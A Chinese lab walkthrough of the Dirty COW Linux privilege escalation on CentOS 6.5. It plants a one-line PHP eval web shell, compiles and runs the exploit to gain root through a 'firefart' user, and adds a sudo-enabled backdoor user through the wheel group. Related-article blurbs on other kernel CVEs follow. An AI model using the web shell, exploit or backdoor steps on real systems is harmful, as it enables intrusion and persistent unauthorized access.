Linux脏牛漏洞提权复现

简介: 操作系统: Linux ( CentOS 6.5)Web服务: PHP+Apache

操作系统: Linux ( CentOS 6.5)

Web服务: PHP+Apache

环境搭建

第一步,配置yum源,安装PHP

进入yum目录

cd /etc/yum.repos.d/

image.png

创建文件夹a

mkdir a

image.png

将此目录下的所有文件移动至文件夹a中

mv C* a

image.png

创建yum源文件

1. vim my.repo     -- 创建yum源文件,内容如下:
2. 
3. [sss]
4. name=my
5. baseurl=file:/media/CentOS_6.5_Final
6. gpgcheck=0

image.png

安装PHP( 安装的PHP自带Apache )

yum install php -y

image.png

安装gcc编译工具( 方便后续操作的使用 )

yum install gcc

image.png

启动Apache服务

service httpd start

image.png

关闭防火墙

service iptables stop

image.png

关闭内核防火墙

setenforce 0

image.png

访问Web网站( 里面啥也没有,主要是为了测试漏洞 )

image.png

第二步,上传木马,使用中国菜刀连接

网站根目录上传木马文件( 这里直接写一个木马文件 ),内容为一句话木马,网站的默认根目录是/var/www/html目录

cd /var/www/html/

image.png

vim shell.php

image.png

<?php eval($_POST[-7]); ?>

image.png

使用中国菜刀连接


image.png


漏洞复现

第三步,查看内核版本,上传对应的脏牛工具


使用中国菜刀打开虚拟终端,使用id命令查看当前用户


image.png


uname -a 查看Linux内核版本信息


image.png


使用中国菜刀打开文件管理,上传脏牛工具到/tmp目录下,Linux只有tmp目录默认有上传和执行权限


image.png


第四步,使用脏牛工具进行提权

进入/tmp目录,编译脏牛工具( 上传的工具属于源码脚本,编译后才能执行)

gcc -pthread dirty.c -o dirty -lcrypt

image.png

执行脏牛工具,执行文件即可,后面的数字是密码,可随便定义,

./dirty 123456

提示执行超时以及命令执行失败,不用管,查看用户信息,脚本已经生效,firefart用户具有原本root用户的权限,密码为我们上一步设置的123456

cat /etc/passwd

image.png

使用firefart用户进行远程连接( 此处使用Xshell工具进行连接 )

ssh firefart@192.168.145.130

image.png

第五步,利用提升的权限创建后门用户

还原/etc/passwd,使用脏牛工具备份的passwd.bak文件替换/etc/passwd文件

mv /tmp/passwd.bak /etc/passwd

image.png

wheel组为普通管理员组,默认不开启,利用这个wheel组来创建后门用户

修改/etc/sudoers配置文件,默认只读,需要添加修改权限

chmod u+w /etc/sudoers

image.png

去除/etc/sudoers配置文件中105行的注释,使wheel组生效

vim /etc/sudoers

image.png

创建普通用户tom,并添加至wheel组,使其拥有管理员权限

1. useradd tom
2. passwd tom
3. gpasswd -a tom wheel

image.png

低级用户切换高级用户需要高级用户的密码,而我们创建的后门用户不需要密码即可切换root用户

sudo su root

image.png


相关文章
|
安全 Ubuntu Linux
Linux Kernel 权限提升漏洞 (CVE-2023-32233)
Linux Netfilter 是一个在 Linux 内核中的网络数据包处理框架,也称作 iptables,它可以通过各种规则和过滤器,基于数据包的来源、目标地址、协议类型、端口号等信息,控制网络流量和数据包的转发和处理,是 Linux 系统网络安全性和可靠性的重要组成部分
279 1
Linux Kernel 权限提升漏洞 (CVE-2023-32233)
|
安全 Linux 数据安全/隐私保护
百度搜索:蓝易云【OpenVAS 检查 Linux 服务器漏洞教程!】
通过上述步骤,你可以在Linux服务器上使用OpenVAS进行漏洞检测。请注意,漏洞检测和扫描是一个复杂的过程,需要持续的更新和管理。建议参考OpenVAS的官方文档和用户指南,以了解更多关于配置和使用OpenVAS的详细信息。
144 0
百度搜索:蓝易云【OpenVAS 检查 Linux 服务器漏洞教程!】
|
安全 Ubuntu Linux
Linux Kernel openvswitch模块权限提升漏洞(CVE-2022-2639)
Linux 内核模块Open vSwitch 存在越界写入漏洞,在足够多actions情况下,在为新的flow的新的action拷贝和预留内存时,如果next_offset比MAX_ACTIONS_BUFSIZE大,reserve_sfa_size并不会如期返回 -EMSGSIZE,此时会产生越界写入漏洞。攻击者可以利用该漏洞将普通权限提升至ROOT权限。
131 1
|
安全 Linux
Linux内核OverlayFS子系统权限提升漏洞(CVE-2023-0386)
Linux内核OverlayFS子系统权限提升漏洞,在Linux内核的 OverlayFS子系统中,当用户将一个具有权限的文件从一个nosuid挂载点复制到另一个挂载点时,未经授权的攻击者可以执行setuid文件,导致权限提升。
212 1
|
安全 Ubuntu Linux
CVE-2021-3560 Linux Polkit 权限提升漏洞
Polkit是默认安装在很多Linux发行版上的系统服务,它由systemd使用,因此任何使用systemd的Linux发行版也使用Polkit。
161 2
|
1月前
|
安全 算法 Linux
Linux 服务器还有漏洞?建议使用 OpenVAS 日常检查!
在数字化时代,Linux 服务器的安全至关重要。OpenVAS 是一款优秀的开源漏洞扫描工具,可以帮助及时发现并修复服务器中的安全隐患。本文将介绍 OpenVAS 的主要功能、使用方法及应对漏洞的措施,帮助用户加强服务器安全管理,确保企业数字化安全。
59 7
|
1月前
|
存储 Ubuntu Linux
2024全网最全面及最新且最为详细的网络安全技巧 (三) 之 linux提权各类技巧 上集
在本节实验中,我们学习了 Linux 系统登录认证的过程,文件的意义,并通过做实验的方式对 Linux 系统 passwd 文件提权方法有了深入的理解。祝你在接下来的技巧课程中学习愉快,学有所获~和文件是 Linux 系统登录认证的关键文件,如果系统运维人员对shadow或shadow文件的内容或权限配置有误,则可以被利用来进行系统提权。上一章中,我们已经学习了文件的提权方法, 在本章节中,我们将学习如何利用来完成系统提权。在本节实验中,我们学习了。
|
5月前
|
弹性计算 安全 Linux
云服务器 ECS产品使用问题之如何处理Linux软件漏洞
云服务器ECS(Elastic Compute Service)是各大云服务商阿里云提供的一种基础云计算服务,它允许用户租用云端计算资源来部署和运行各种应用程序。以下是一个关于如何使用ECS产品的综合指南。
|
5月前
|
自然语言处理 安全 Shell
Linux 提权-SUID/SGID_1 本文通过 Google 翻译 SUID | SGID Part-1 – Linux Privilege Escalation 这篇文章所产生,本人仅是对机器翻译中部分表达别扭的字词进行了校正及个别注释补充。
接下来,让我们看看 SUID3NUM 在枚举 SUID 二进制文件方面的表现如何。 3.2、枚举 SUID 二进制文件 – SUID3NUM 我们将用来枚举 SUID 二进制文件的第二个工具是 SUID3NUM。这是一个很棒的工具,因为它是专门为枚举 SUID 二进制文件而创建的。但这还不是全部,它还提供了可用于提升权限的命令(命令从 GTFOBins 中提取)。 这还不是最好的部分,SUID3NUM 还具有内置的 autopwn 功能,可以通过 -e 开关激活! 在 OSCP 考试中也使用此工具,只要您不使用自动利用功能。 3.2.1、下载并执行 SUID3NUM 我们可以从 GitHubs
47 0
|
7月前
|
安全 算法 Linux
【专栏】Linux 服务器还有漏洞?OpenVAS 是一款开源的漏洞扫描工具,用于全面评估 Linux 服务器安全
【4月更文挑战第28天】OpenVAS 是一款开源的漏洞扫描工具,用于全面评估 Linux 服务器安全。它具有全面性、准确性和实时性的特点,能扫描各种设备并及时发现安全漏洞。使用 OpenVAS 包括安装、配置和执行扫描,以及分析结果并采取修复措施。在使用过程中应注意扫描时间、范围和策略的选择。通过定期检查和修复漏洞,结合其他安全措施,可以提升服务器安全性。OpenVAS 是保障 Linux 服务器安全的重要工具,但安全维护也需要持续学习和适应新挑战。
210 1